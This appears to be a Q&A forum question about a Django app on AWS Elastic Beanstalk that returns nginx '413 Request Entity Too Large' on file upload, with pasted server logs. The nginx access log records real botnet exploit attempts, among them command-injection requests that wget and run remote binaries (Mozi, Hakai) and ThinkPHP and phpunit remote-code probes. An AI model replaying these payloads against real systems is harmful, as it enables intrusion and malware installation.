# 413 Request Entity Too Large - Regular Fix Not Working

Tags: python, django, amazon-web-services, nginx, amazon-elastic-beanstalk

I'm deploying a Django application online using AWS Elastic Beanstalk. It worked fine for a while, but some change is causing the application to throw a '413 Request Entity Too Large nginx/1.18.0' error when I try to upload a file.

Here are my logs:

stdout log:

```
----------------------------------------
/var/log/web.stdout.log
----------------------------------------
Sep  8 19:59:39 ip-172-31-16-39 web: Bad Request: /
Sep  8 21:27:14 ip-172-31-16-39 web: Not Found: /static/tinymce/css/prism.css
Sep  8 21:27:14 ip-172-31-16-39 web: Not Found: /static/tinymce/js/prism.js
Sep  8 21:27:14 ip-172-31-16-39 web: Not Found: /favicon.ico
Sep  8 21:27:16 ip-172-31-16-39 web: Not Found: /static/tinymce/css/prism.css
Sep  8 21:27:16 ip-172-31-16-39 web: Not Found: /static/tinymce/js/prism.js
```

access log:

```
----------------------------------------
/var/log/nginx/access.log
----------------------------------------
192.241.237.101 - - [07/Sep/2020:09:35:44 +0000] "GET /hudson HTTP/1.1" 400 59666 "-" "Mozilla/5.0 zgrab/0.x" "-"
3.134.93.214 - - [07/Sep/2020:10:07:18 +0000] "HEAD /robots.txt HTTP/1.0" 404 0 "-" "-" "-"
189.39.247.131 - - [07/Sep/2020:11:25:33 +0000] "GET / HTTP/1.1" 400 59689 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" "-"
195.54.160.21 - - [07/Sep/2020:12:20:29 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 400 60308 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
195.54.160.21 - - [07/Sep/2020:12:21:47 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 400 60242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
195.54.160.21 - - [07/Sep/2020:12:23:28 +0000] "GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1" 400 60812 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
195.54.160.21 - - [07/Sep/2020:12:23:57 +0000] "GET /index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 400 61461 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
195.54.160.21 - - [07/Sep/2020:12:43:18 +0000] "POST /api/jsonws/invoke HTTP/1.1" 400 60160 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
192.241.223.11 - - [07/Sep/2020:13:22:19 +0000] "GET / HTTP/1.1" 400 59600 "-" "Mozilla/5.0 zgrab/0.x" "-"
195.54.160.21 - - [07/Sep/2020:13:23:33 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 400 60420 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
13.75.252.149 - - [07/Sep/2020:13:27:17 +0000] "HEAD /robots.txt HTTP/1.0" 404 0 "-" "-" "-"
195.54.160.21 - - [07/Sep/2020:13:37:01 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 400 60896 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
66.240.205.34 - - [07/Sep/2020:13:39:44 +0000] "Gh0st\xAD\x00\x00\x00\xE0\x00\x00\x00x\x9CKS``\x98\xC3\xC0\xC0\xC0\x06\xC4\x8C@\xBCQ\x96\x81\x81\x09H\x07\xA7\x16\x95e&\xA7*\x04$&g+\x182\x94\xF6\xB000\xAC\xA8rc\x00\x01\x11\xA0\x82\x1F\x5C`&\x83\xC7K7\x86\x19\xE5n\x0C9\x95n\x0C;\x84\x0F3\xAC\xE8sch\xA8^\xCF4'J\x97\xA9\x82\xE30\xC3\x91h]&\x90\xF8\xCE\x97S\xCBA4L?2=\xE1\xC4\x92\x86\x0B@\xF5`\x0CT\x1F\xAE\xAF]" 400 157 "-" "-" "-"
175.0.8.221 - - [07/Sep/2020:14:14:23 +0000] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 3327 "-" "-" "-"
182.117.96.194 - - [07/Sep/2020:15:16:47 +0000] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 3196 "-" "Hello, World" "-"
182.117.96.194 - - [07/Sep/2020:15:16:52 +0000] ";sh+/tmp/gpon80&ipv=0" 400 157 "-" "-" "-"
185.172.110.223 - - [07/Sep/2020:16:27:38 +0000] "GET / HTTP/1.1" 400 60077 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-"
72.70.99.205 - - [07/Sep/2020:16:31:52 +0000] "GET / HTTP/1.1" 400 34621 "-" "-" "-"
87.103.245.177 - - [07/Sep/2020:16:55:41 +0000] "GET / HTTP/1.1" 400 59675 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" "-"
77.71.48.244 - - [07/Sep/2020:17:28:47 +0000] "GET / HTTP/1.1" 400 59685 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" "-"
91.133.12.77 - - [07/Sep/2020:17:56:59 +0000] "GET / HTTP/1.1" 400 59673 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" "-"
188.119.34.250 - - [07/Sep/2020:18:14:46 +0000] "GET / HTTP/1.1" 400 59681 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" "-"
45.148.10.28 - - [07/Sep/2020:18:37:31 +0000] "POST /boaform/admin/formLogin HTTP/1.1" 400 40317 "http://54.191.28.187:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" "-"
157.230.60.101 - - [07/Sep/2020:19:00:05 +0000] "GET / HTTP/1.1" 400 59600 "-" "Mozilla/5.0 zgrab/0.x" "-"
185.172.110.223 - - [07/Sep/2020:20:39:59 +0000] "GET / HTTP/1.1" 400 60069 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-"
193.118.53.194 - - [07/Sep/2020:20:55:56 +0000] "GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1" 400 60539 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-"
102.165.30.61 - - [07/Sep/2020:21:17:13 +0000] "GET / HTTP/1.1" 400 59574 "-" "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-"
209.17.96.2 - - [07/Sep/2020:21:25:22 +0000] "GET / HTTP/1.0" 200 1567 "-" "Mozilla/5.0 (compatible; Nimbostratus-Bot/v1.3.2; http://cloudsystemnetworks.com)" "-"
192.241.226.156 - - [07/Sep/2020:21:58:26 +0000] "GET /portal/redlion HTTP/1.1" 400 59762 "-" "Mozilla/5.0 zgrab/0.x" "-"
78.108.105.38 - - [07/Sep/2020:22:46:51 +0000] "GET / HTTP/1.1" 400 59687 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" "-"
177.200.3.24 - - [07/Sep/2020:22:50:55 +0000] "GET / HTTP/1.1" 400 59685 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" "-"
117.10.199.75 - - [08/Sep/2020:00:47:19 +0000] "POST /HNAP1/ HTTP/1.0" 400 0 "-" "-" "-"
45.148.10.28 - - [08/Sep/2020:01:10:32 +0000] "POST /boaform/admin/formLogin HTTP/1.1" 400 40317 "http://54.191.28.187:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" "-"
209.17.96.26 - - [08/Sep/2020:01:23:00 +0000] "GET / HTTP/1.1" 400 59482 "-" "Mozilla/5.0 (compatible; Nimbostratus-Bot/v1.3.2; http://cloudsystemnetworks.com)" "-"
167.248.133.33 - - [08/Sep/2020:01:35:32 +0000] "GET / HTTP/1.1" 400 51901 "-" "-" "-"
167.248.133.33 - - [08/Sep/2020:01:35:32 +0000] "GET / HTTP/1.1" 400 59706 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-"
191.5.162.197 - - [08/Sep/2020:02:20:28 +0000] "GET / HTTP/1.1" 400 59673 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" "-"
87.251.67.210 - - [08/Sep/2020:04:24:57 +0000] "\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 157 "-" "-" "-"
36.84.145.250 - - [08/Sep/2020:05:16:30 +0000] "GET / HTTP/1.1" 400 59673 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" "-"
167.248.133.52 - - [08/Sep/2020:06:02:25 +0000] "GET / HTTP/1.1" 400 51901 "-" "-" "-"
167.248.133.52 - - [08/Sep/2020:06:02:25 +0000] "GET / HTTP/1.1" 400 59706 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-"
162.142.125.51 - - [08/Sep/2020:06:07:09 +0000] "GET / HTTP/1.1" 400 51901 "-" "-" "-"
162.142.125.51 - - [08/Sep/2020:06:07:09 +0000] "GET / HTTP/1.1" 400 59706 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-"
94.231.180.211 - - [08/Sep/2020:07:31:40 +0000] "GET / HTTP/1.1" 400 59669 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" "-"
102.41.166.171 - - [08/Sep/2020:07:45:05 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+185.132.53.147/hakaibin/h4k4i.arm7;chmod+777+/tmp/h4k4i.arm7;sh+/tmp/h4k4i.arm7+hakai.Rep.Jaws HTTP/1.1" 404 3265 "-" "Hello, world" "-"
109.95.79.20 - - [08/Sep/2020:08:52:10 +0000] "GET / HTTP/1.1" 400 59671 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" "-"
94.102.49.193 - - [08/Sep/2020:08:55:11 +0000] "GET / HTTP/1.1" 400 59852 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "-"
94.102.49.193 - - [08/Sep/2020:08:55:12 +0000] "GET /robots.txt HTTP/1.1" 400 59423 "-" "-" "-"
94.102.49.193 - - [08/Sep/2020:08:55:13 +0000] "GET /sitemap.xml HTTP/1.1" 400 59435 "-" "-" "-"
94.102.49.193 - - [08/Sep/2020:08:55:14 +0000] "GET /.well-known/security.txt HTTP/1.1" 400 59591 "-" "-" "-"
94.102.49.193 - - [08/Sep/2020:08:55:15 +0000] "GET /favicon.ico HTTP/1.1" 400 59741 "-" "python-requests/2.23.0" "-"
102.43.100.198 - - [08/Sep/2020:09:00:51 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+185.132.53.147/hakaibin/h4k4i.arm7;chmod+777+/tmp/h4k4i.arm7;sh+/tmp/h4k4i.arm7+hakai.Rep.Jaws HTTP/1.1" 499 0 "-" "Hello, world" "-"
61.219.11.153 - - [08/Sep/2020:09:11:05 +0000] "lv[endof]" 400 157 "-" "-" "-"
5.57.36.22 - - [08/Sep/2020:10:04:26 +0000] "GET / HTTP/1.1" 400 59667 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" "-"
87.251.67.210 - - [08/Sep/2020:10:08:05 +0000] "\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 157 "-" "-" "-"
192.35.168.32 - - [08/Sep/2020:10:13:46 +0000] "GET / HTTP/1.1" 400 59598 "-" "Mozilla/5.0 zgrab/0.x" "-"
122.152.55.47 - - [08/Sep/2020:10:59:08 +0000] "GET / HTTP/1.1" 400 59675 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" "-"
62.38.222.117 - - [08/Sep/2020:11:02:20 +0000] "GET / HTTP/1.1" 400 59673 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" "-"
106.53.118.8 - - [08/Sep/2020:12:10:05 +0000] "GET /TP/public/index.php HTTP/1.1" 400 59858 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" "-"
106.53.118.8 - - [08/Sep/2020:12:10:06 +0000] "GET /TP/index.php HTTP/1.1" 400 59774 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" "-"
106.53.118.8 - - [08/Sep/2020:12:10:07 +0000] "GET /thinkphp/html/public/index.php HTTP/1.1" 400 59990 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" "-"
106.53.118.8 - - [08/Sep/2020:12:10:07 +0000] "GET /html/public/index.php HTTP/1.1" 400 59882 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" "-"
106.53.118.8 - - [08/Sep/2020:12:10:13 +0000] "GET / HTTP/1.1" 400 59630 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" "-"
222.186.136.164 - - [08/Sep/2020:12:37:33 +0000] "GET / HTTP/1.1" 400 43573 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)" "-"
222.186.136.164 - - [08/Sep/2020:12:37:34 +0000] "GET / HTTP/1.1" 400 43573 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)" "-"
222.186.136.164 - - [08/Sep/2020:12:37:34 +0000] "GET //dede/tpl.php HTTP/1.1" 400 43573 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)" "-"
222.186.136.164 - - [08/Sep/2020:12:37:35 +0000] "GET //console/login/LoginForm.jsp HTTP/1.1" 400 59864 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)" "-"
222.186.136.164 - - [08/Sep/2020:12:37:36 +0000] "GET //login.action HTTP/1.1" 400 59699 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)" "-"
222.186.136.164 - - [08/Sep/2020:12:37:37 +0000] "GET //showcase.action HTTP/1.1" 400 43573 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)" "-"
222.186.136.164 - - [08/Sep/2020:12:37:40 +0000] "GET //upload.action HTTP/1.1" 400 59688 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)" "-"
222.186.136.164 - - [08/Sep/2020:12:37:42 +0000] "GET //showAnouncement.action HTTP/1.1" 400 59796 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)" "-"
222.186.136.164 - - [08/Sep/2020:12:37:43 +0000] "GET //public/index.php HTTP/1.1" 400 43573 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)" "-"
222.186.136.164 - - [08/Sep/2020:12:37:44 +0000] "GET //index.php HTTP/1.1" 400 45924 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)" "-"
192.241.220.33 - - [08/Sep/2020:12:59:06 +0000] "GET /hudson HTTP/1.1" 400 59672 "-" "Mozilla/5.0 zgrab/0.x" "-"
148.251.10.115 - - [08/Sep/2020:13:15:02 +0000] "GET /.env HTTP/1.1" 400 59872 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-"
148.251.10.115 - - [08/Sep/2020:13:15:02 +0000] "POST / HTTP/1.1" 400 60407 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-"
178.73.215.171 - - [08/Sep/2020:13:32:49 +0000] "GET / HTTP/1.0" 200 1567 "-" "-" "-"
172.104.108.109 - - [08/Sep/2020:14:07:42 +0000] "GET / HTTP/1.1" 400 25842 "-" "Mozilla/5.0" "-"
185.39.11.105 - - [08/Sep/2020:14:18:52 +0000] "GET http://example.com/ HTTP/1.1" 400 40317 "-" "Go-http-client/1.1" "-"
89.44.176.112 - - [08/Sep/2020:14:27:23 +0000] "GET / HTTP/1.1" 400 59673 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" "-"
198.143.133.154 - - [08/Sep/2020:14:49:08 +0000] "GET / HTTP/1.1" 400 59812 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "-"
128.14.133.58 - - [08/Sep/2020:16:09:04 +0000] "GET / HTTP/1.1" 400 59818 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-"
139.162.106.181 - - [08/Sep/2020:17:34:00 +0000] "GET / HTTP/1.1" 400 59400 "-" "HTTP Banner Detection (https://security.ipip.net)" "-"
219.65.47.214 - - [08/Sep/2020:17:57:48 +0000] "GET / HTTP/1.1" 400 59675 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" "-"
83.97.20.21 - - [08/Sep/2020:18:08:44 +0000] "GET / HTTP/1.0" 200 1567 "-" "-" "-"
45.148.10.28 - - [08/Sep/2020:18:15:12 +0000] "POST /boaform/admin/formLogin HTTP/1.1" 400 61355 "http://54.191.28.187:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" "-"
45.148.10.28 - - [08/Sep/2020:18:15:12 +0000] "" 400 0 "-" "-" "-"
46.236.65.241 - - [08/Sep/2020:18:27:13 +0000] "GET / HTTP/1.1" 400 59665 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" "-"
192.241.228.161 - - [08/Sep/2020:19:07:54 +0000] "GET / HTTP/1.1" 400 59594 "-" "Mozilla/5.0 zgrab/0.x" "-"
192.140.37.42 - - [08/Sep/2020:19:59:39 +0000] "GET / HTTP/1.1" 400 59675 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" "-"
156.96.156.138 - - [08/Sep/2020:20:54:28 +0000] "GET / HTTP/1.0" 200 1567 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" "-"
173.49.32.209 - - [08/Sep/2020:21:27:14 +0000] "GET / HTTP/1.1" 200 1567 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36" "-"
173.49.32.209 - - [08/Sep/2020:21:27:14 +0000] "GET /static/tinymce/css/prism.css HTTP/1.1" 404 1831 "http://testing-env.us-west-2.elasticbeanstalk.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36" "-"
173.49.32.209 - - [08/Sep/2020:21:27:14 +0000] "GET /static/tinymce/js/prism.js HTTP/1.1" 404 1825 "http://testing-env.us-west-2.elasticbeanstalk.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36" "-"
173.49.32.209 - - [08/Sep/2020:21:27:14 +0000] "GET /favicon.ico HTTP/1.1" 404 3199 "http://testing-env.us-west-2.elasticbeanstalk.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36" "-"
173.49.32.209 - - [08/Sep/2020:21:27:16 +0000] "GET /covid HTTP/1.1" 301 0 "http://testing-env.us-west-2.elasticbeanstalk.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36" "-"
173.49.32.209 - - [08/Sep/2020:21:27:16 +0000] "GET /covid/ HTTP/1.1" 200 2472 "http://testing-env.us-west-2.elasticbeanstalk.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36" "-"
173.49.32.209 - - [08/Sep/2020:21:27:16 +0000] "GET /static/tinymce/css/prism.css HTTP/1.1" 404 1831 "http://testing-env.us-west-2.elasticbeanstalk.com/covid/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36" "-"
173.49.32.209 - - [08/Sep/2020:21:27:16 +0000] "GET /static/tinymce/js/prism.js HTTP/1.1" 404 1825 "http://testing-env.us-west-2.elasticbeanstalk.com/covid/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36" "-"
173.49.32.209 - - [08/Sep/2020:21:27:23 +0000] "POST /covid/ HTTP/1.1" 413 585 "http://testing-env.us-west-2.elasticbeanstalk.com/covid/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36" "-"
```

error log:

```
----------------------------------------
/var/log/nginx/error.log
----------------------------------------
2020/08/31 15:39:40 [error] 32014#0: *1 client intended to send too large body: 18862700 bytes, client: 98.114.91.108, server: , request: "POST /covid/ HTTP/1.1", host: "testing-env.us-west-2.elasticbeanstalk.com", referrer: "http://testing-env.us-west-2.elasticbeanstalk.com/covid/"
2020/08/31 16:50:03 [warn] 32014#0: *14 using uninitialized "year" variable while logging request, client: 188.166.55.205, server: , request: "GET / HTTP/1.1"
2020/08/31 16:50:03 [warn] 32014#0: *14 using uninitialized "month" variable while logging request, client: 188.166.55.205, server: , request: "GET / HTTP/1.1"
2020/08/31 16:50:03 [warn] 32014#0: *14 using uninitialized "day" variable while logging request, client: 188.166.55.205, server: , request: "GET / HTTP/1.1"
2020/08/31 16:50:03 [warn] 32014#0: *14 using uninitialized "hour" variable while logging request, client: 188.166.55.205, server: , request: "GET / HTTP/1.1"
2020/09/08 18:15:12 [warn] 32014#0: *909 using uninitialized "year" variable while logging request, client: 45.148.10.28, server: 
2020/09/08 18:15:12 [warn] 32014#0: *909 using uninitialized "month" variable while logging request, client: 45.148.10.28, server: 
2020/09/08 18:15:12 [warn] 32014#0: *909 using uninitialized "day" variable while logging request, client: 45.148.10.28, server: 
2020/09/08 18:15:12 [warn] 32014#0: *909 using uninitialized "hour" variable while logging request, client: 45.148.10.28, server: 
2020/09/08 21:27:21 [error] 32014#0: *920 client intended to send too large body: 13128050 bytes, client: 173.49.32.209, server: , request: "POST /covid/ HTTP/1.1", host: "testing-env.us-west-2.elasticbeanstalk.com", referrer: "http://testing-env.us-west-2.elasticbeanstalk.com/covid/"
```

eb-engine log:

```
----------------------------------------
/var/log/eb-engine.log
----------------------------------------

2020/08/31 15:38:41.040550 [INFO] Running command /bin/sh -c systemctl is-active web.service
2020/08/31 15:38:41.043806 [INFO] Running command /bin/sh -c systemctl start web.service
2020/08/31 15:38:41.637552 [INFO] Executing instruction: start X-Ray
2020/08/31 15:38:41.637570 [INFO] X-Ray is not enabled.
2020/08/31 15:38:41.637576 [INFO] Executing instruction: start proxy with new configuration
2020/08/31 15:38:41.637605 [INFO] Running command /bin/sh -c /usr/sbin/nginx -t -c /var/proxy/staging/nginx/nginx.conf
2020/08/31 15:38:41.646555 [INFO] Running command /bin/sh -c cp -rp /var/proxy/staging/nginx/* /etc/nginx
2020/08/31 15:38:41.648731 [INFO] Running command /bin/sh -c systemctl show -p PartOf nginx.service
2020/08/31 15:38:41.655854 [INFO] Running command /bin/sh -c systemctl daemon-reload
2020/08/31 15:38:41.724618 [INFO] Running command /bin/sh -c systemctl reset-failed
2020/08/31 15:38:41.730039 [INFO] Running command /bin/sh -c systemctl show -p PartOf nginx.service
2020/08/31 15:38:41.735205 [INFO] Running command /bin/sh -c systemctl is-active nginx.service
2020/08/31 15:38:41.738632 [INFO] Running command /bin/sh -c systemctl start nginx.service
2020/08/31 15:38:41.815251 [INFO] Executing instruction: configureSqsd
2020/08/31 15:38:41.815269 [INFO] This is a web server environment instance, skip configure sqsd daemon ...
2020/08/31 15:38:41.815275 [INFO] Executing instruction: startSqsd
2020/08/31 15:38:41.815279 [INFO] This is a web server environment instance, skip start sqsd daemon ...
2020/08/31 15:38:41.815283 [INFO] Executing instruction: Track pids in healthd
2020/08/31 15:38:41.815288 [INFO] This is an enhanced health env...
2020/08/31 15:38:41.815308 [INFO] Running command /bin/sh -c systemctl show -p ConsistsOf aws-eb.target | cut -d= -f2
2020/08/31 15:38:41.822577 [INFO] cfn-hup.service healthd.service nginx.service

2020/08/31 15:38:41.822607 [INFO] Running command /bin/sh -c systemctl show -p ConsistsOf eb-app.target | cut -d= -f2
2020/08/31 15:38:41.831295 [INFO] web.service

2020/08/31 15:38:41.831481 [INFO] Executing instruction: RunAppDeployPostDeployHooks
2020/08/31 15:38:41.831493 [INFO] The dir .platform/hooks/postdeploy/ does not exist in the application. Skipping this step...
2020/08/31 15:38:41.831498 [INFO] Executing cleanup logic
2020/08/31 15:38:41.831594 [INFO] CommandService Response: {"status":"SUCCESS","api_version":"1.0","results":[{"status":"SUCCESS","msg":"Engine execution has succeeded.","returncode":0,"events":[{"msg":"Instance deployment successfully generated a 'Procfile'.","timestamp":1598888317,"severity":"INFO"},{"msg":"Instance deployment completed successfully.","timestamp":1598888321,"severity":"INFO"}]}]}

2020/08/31 15:38:41.831756 [INFO] Platform Engine finished execution on command: app-deploy

2020/08/31 15:40:02.514572 [INFO] Starting...
2020/08/31 15:40:02.514622 [INFO] Starting EBPlatform-PlatformEngine
2020/08/31 15:40:02.514645 [INFO] reading event message file
2020/08/31 15:40:02.514749 [INFO] no eb envtier info file found, skip loading env tier info.
2020/08/31 15:40:02.514814 [INFO] Engine received EB command cfn-hup-exec

2020/08/31 15:40:02.703882 [INFO] Running command /bin/sh -c /opt/aws/bin/cfn-get-metadata -s arn:aws:cloudformation:us-west-2:719930975199:stack/awseb-e-kagvpnbvff-stack/2e434ba0-eb98-11ea-a9bf-0ae10a278694 -r AWSEBAutoScalingGroup --region us-west-2
2020/08/31 15:40:03.061324 [INFO] Running command /bin/sh -c /opt/aws/bin/cfn-get-metadata -s arn:aws:cloudformation:us-west-2:719930975199:stack/awseb-e-kagvpnbvff-stack/2e434ba0-eb98-11ea-a9bf-0ae10a278694 -r AWSEBBeanstalkMetadata --region us-west-2
2020/08/31 15:40:03.416480 [INFO] checking whether command tail-log is applicable to this instance...
2020/08/31 15:40:03.416494 [INFO] this command is applicable to the instance, thus instance should execute command
2020/08/31 15:40:03.416499 [INFO] Engine command: (tail-log)

2020/08/31 15:40:03.416549 [INFO] Executing instruction: GetTailLogs
2020/08/31 15:40:03.416554 [INFO] Tail Logs...
2020/08/31 15:40:03.416792 [INFO] Running command /bin/sh -c tail -n 100 /var/log/eb-engine.log
2020/08/31 15:40:03.418484 [INFO] Running command /bin/sh -c tail -n 100 /var/log/web.stdout.log
